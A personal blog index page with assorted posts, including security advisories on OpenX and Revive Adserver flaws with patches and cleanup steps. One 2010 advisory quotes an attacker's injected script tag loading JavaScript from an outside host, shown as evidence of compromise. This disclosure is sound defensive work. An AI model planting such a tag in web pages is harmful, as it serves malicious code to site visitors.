10. January 2017

List of Tools for Monitoring Windows Server Performance

Is your Windows Server still running smoothly as expected? There is a wide range of tools that help you monitoring server performance. I have compiled an extensive list of such monitoring tools for Windows servers:

» 40 Windows Server Performance Monitoring Tools

22. April 2016

10 Easily Preventable Server Failures Every Sysadmin Should Frequently Check For

Monitoring servers is no trivial task. There are plenty of things that can go wrong, many of them quite unexpected. A few things, however, can be checked within seconds and still would cause great pain if left unchecked.

Be sure to keep an eye on these 10 easily preventable server failures.

Keywords: devopsITmonitoringserver monitoringsysadmin

18. December 2013

Zero Day Vulnerability in OpenX Source 2.8.11 and Revive Adserver 3.0.1

The current versions of the popular ad server software OpenX Source (2.8.11) and Revive Adserver (3.0.1) are vulnerable a sql injection attack which allows attackers to gain backend access. The vulnerability is actively being exploited.

The OpenX team has been informed. For Revive, I submitted a pull request with a fix.

Since Revive Adserver is the official successor to OpenX Source, I assume that there will not be an updated version of OpenX Source (after all, there wasn’t one for the last vulnerability). I have created a set of patched files which fix the vulnearbility in OpenX 2.8.11: openx-2.8.11-sql-injection-patch.zip. To patch Revive Adserver, use the files from revive-3.0.1-sql-injection-patch.zip.

I recommend applying the patches immediately, since the vulnerability is actively being exploited and has been for some time now.

Update 19.12.: The revive team confirmed the vulnerability and is working on a fixed version.
Update 20.12.: The Revive team released Revive Adserver 3.0.2 which fixes the vulnerability. If possible, I recommend to update to this version as soon as possible (including users of OpenX). Thanks a lot to the team for the quick reaction!
The Revive team also suggest a quicker temporary fix for people who cannot update right away: Remove “www/delivery/axmlrpc.php” if you do not need xmlrpc delivery (most setups use different delivery methods).
Update 3.2.2014: Removing axmlrpc.php alone does not seem to be enough to fully protect an installation. dxmlrpc.php should be removed as well. Many thanks to Péter Veres for the discovery!

By the way

If you are managing an OpenX Source or Revive Adserver installation, take a look at the OpenX Maintenance Checklist or Revive Adserver Maintenance Checklist. It helps you keeping track of frequent maintenance tasks and security checks. If you sign up for an account at Checkpanel (not required) you can easily manage this checklist. You can see when you last checked each item, set reminders, work in teams and more. Checkpanel is not limited to OpenX/Revive checklists – it helps you managing all kinds of recurring tasks (see some other samples and features).

(This article is also available in German)

11. September 2013

Zero-day Vulnerability in OpenX Source 2.8.11

The current version of the popular ad server software OpenX Source (2.8.11) is vulnerable to code injection attacks by a subset of registered users. The vulnerability is being actively exploited.

The problem can be fixed by changing line 311 in lib/OX/Extension/deliveryLimitations/DeliveryLimitations.php as follows:

$result = 'MAX_check' . ucfirst($this->group) . '_' . $this->component . "('".addslashes($data)."', '".addslashes($this->comparison)."')";

Users of OpenX should apply this fix immediately even if only trusted parties have access to the installation. The vulnerability is used in conjunction with other vulnerabilities to gain system access through highjacked accounts.

Revive Adserver (a fork of OpenX source) is vulnerable as well. I have submitted a pull request. Update: The Revive team confirmed the issue and accepted my patch on the same day.

By the way

If you are managing an OpenX ad server installation, take a look at the OpenX Maintenance Checklist. It helps you keeping track of frequent maintenance tasks and security checks. If you sign up for an account at Checkpanel (not required) you can easily manage this checklist. You can see when you last checked each item, set reminders, work in teams and more. Checkpanel is not limited to OpenX checklists – it helps you managing all kinds of recurring tasks (see some other samples and features).

(This article is also available in German)

Keywords: OpenXsecurity

28. May 2013

Checkpanel – Continuous Checklists

Checkpanel screenshot

My new project, Checkpanel, went into public beta recently. Checkpanel is a checklist application which focuses on repeating checks. Unlike traditional checklists, Checkpanel keeps track of all reported checks (marking something as working or not working). You can see who when last checked a test case and what the errors were. You can also let some checks be executed automatically and set reminders for when you would like to check something again. And much more.

I imagined it primarily for use in quality assurance of web apps, for example when you frequently want to check if a recent change broke the contact form or had similar side effects. Of course you can also use it for anything else which needs to be checked frequently. Checkpanel can be used for test case management, regression testing, manual testing, smoke testing and much more.

https://checkpanel.com/ – go try it! :) I’m happy about every beta tester.

9. September 2010

Critical vulnerability in OpenX 2.8.6 & Open Flash Chart 2

There is a critical security flaw in OpenX 2.8.6 (and 2.8.5 and probably several earlier versions) which allows attackers to gain control of the webserver account and thus the adserver. The security hole is being actively exploited in the wild (as I learned the hard way). It seems that this hole is only known to attackers (in the OpenX context) at the moment, since I was not able to find any warning or other reference to it.

The problem lies in the following file:


The file ships with the video plugin. It is a component of Open Flash Chart 2 which is already known to be vulnerable. Basically, it allows an attacker to upload any file to the server including executables. This way, the attacker uploads a php backdoor and gains full access to the webserver account. From there he can (amongst other things) take control over the OpenX installation.

In our case, the attacker created a new admin user in the OpenX database called “root”. Interestingly, this user was not shown anywhere in the user accounts. But it did show up in the user log when he appended the following malicious script to one of our ad zones:

<script type="text/javascript" src="http://keyserveronline.com:8080/File.js"></script>

Interestingly, this vulnerability is also still present in the latest version of Open Flash Chart 2. It wouldn’t be hard to fix, but seemingly noone bothered to release a fix, yet. Me neither, since I do not need this component. A simple workaround is to delete ofc_upload_image.php. The core features of OpenX should not be affected since this file seems to be connected to reports of the video plugin and might even be unused (since it is part of a whole library). Alternatively, access to the file can be restricted via htaccess to trusted users.

I highly recommend to do this immediately, since this vulnerability is being actively exploited.

Also check for signs of a already installed backdoor. In our case, the attacker closed the vulnerability himself (presumably so that noone else can take control over his loot), so take a look at the file before deleting it and compare it with the one that ships with OpenX. If it has been edited, you probably have already been hacked and a backdoor is installed.

What to do once the server has been hacked (Update 11.9.2010)

If you think your server has been compromised, you need to make sure that you get rid of all backdoors that might have been hidden in your system. Finding a backdoor in a compromised OpenX is tricky at best, so better get rid of the original installation completely.

Re-install OpenX and apply the fix mentioned above. Do not keep any files of the old installation. Delete or archive everything that you did not install freshly from a trusted source.

Check your database. Take a look at the table ox_users and delete every entry that does not represent a trusted user. Check the prepend and append fields of all banners and zones. Remove suspicious code.

Change your passwords.

If you want to be absolutely sure, you would have to re-install the whole server because it might have been rooted. But if your server was configured savely and did not contain any vulnerabilities that can be exploited by local users, the chances of this are moderately low. Decide for yourself if you want to take this time consuming measure.

Keywords: OpenXsecurityweb development

12. July 2009

bbPress compatibility plugin for TinyMCE

I’m currently using the WYSIWYG editor TinyMCE with bbPress for a project. Unfortunately, bbPress doesn’t like it when it gets <p> tags through TinyMCE and therefore messes up the post. I have written an (extremely) simple plugin for TinyMCE which transforms <p>s into double linebreaks before posting therefore preserving compatibility. <br />s are transformed into single linebreaks.

The plugin is based on the BBCode plugin by Moxiecode Systems AB distributed together with TinyMCE, so they deserve most of the credit. I only adjusted a few replacement calls.

Currently there is one disadvantage: When you want to edit an existing post, double linebreaks are not converted back into <p>s, but into double <br />s. This usually looks just fine, but is not perfect.


Unpack the zip file into the TinyMCE plugins folder. Add “bbpress” to the list of activated plugins.
Important: Also set remove_linebreaks to false, or all linebreaks will get removed by TinyMCE.


bbPress Plugin for TinyMCE 0.2
bbPress Plugin for TinyMCE 0.1

Keywords: bbPresspluginsTinyMCE

9. March 2009

Music Intersector Now With Up to Five Users

Some time ago, I created a little addon to Last.fm called Music Intersector. It shows which bands are common between the favorites of two users. As you might have noticed, Last.fm has integrated this functionality into its own system, so my old music intersector became a bit pointless.

Not anymore. I just updated it and it can now show the musical similarities between up to five users. Perfect for small parties and gatherings. :)

» Music Intersector

Unfortunately, the number of results declines extremely rapidly with more than two users. There is not much that I can do about it, since Last.fm only offers access to the top 50 artists and not the whole profile.

Keywords: intersectionlast.fmmusicrecommendation

7. February 2009

Ars Electronica Festival 2008: Photos, Impressions and Links

Ars Electronica 2008

Last year, I was at the Ars Electronica Festival in Linz, Austria. Unfortunately, I was too busy with beyond vision to post my impressions immediately, but now I’m going to make up for it. In the months that have passed, my memory of the event has faded a bit, but I’ll do my best to convey an adequate overview, with the help of tons of pictures.

All in all I was not as impressed by the festival in 2008 as I was in 2007. In part, this is because I visited the Ars Electronica Center exhebition for the first time in 2007. That exhibition is one of the greatest, but it did not change a lot from 2007 to 2008, so it was kinda “old news” for me this time.

By the way, visiting the Ars Electronica Festival on a saturday turned out not to be a problem. At first I was worried that the exhibitions would be overcrowded on the weekend, but it wasn’t much different than on the weekday the year before. The decision not to buy a day ticket was also right. I spent much less on single exhebition fees than a day ticket would have cost.

And now for the pictures…

» read on!

(This article is also available in German)

Keywords: Ars ElectronicaartAustriaexhibitionfestivalLinzphotosreport

19. January 2009

beyond vision

beyond vision

There is one project that I was working on, but never found the time to tell you about: beyond vision. It is the largest project that I have done so far and it required so much time that I didn’t have any time left to write about it. :) But in December it was finally completed, so now there is time to tell:

18 musicians, 7 huge screens. beyond vision is the fusion of music and film – not just music with visual support and not just film with film music. Together both media tell an abstract story like it would not be possible for each medium alone.

I already set up a small page full with information about this project, so I will not copy it here. If you are interested, just take a look at the following link:

» beyond vision

I am sorry that I did not have the time to mention this project earlier. I guessed that most of you are probably not from Germany so the tour dates would probably not have been very interesting for you. :) And now, at least I have some more material to show you (don’t miss the photos).

I hope I will be able to show you some more background information soon. A documentary is already in the making, so hopefully I can show you some video footage from the performances somewhen…

Keywords: beyond visionconcertinstallationmetamusicvideo

older articles »

Powered by WordPress

Subscribe to RSS Feed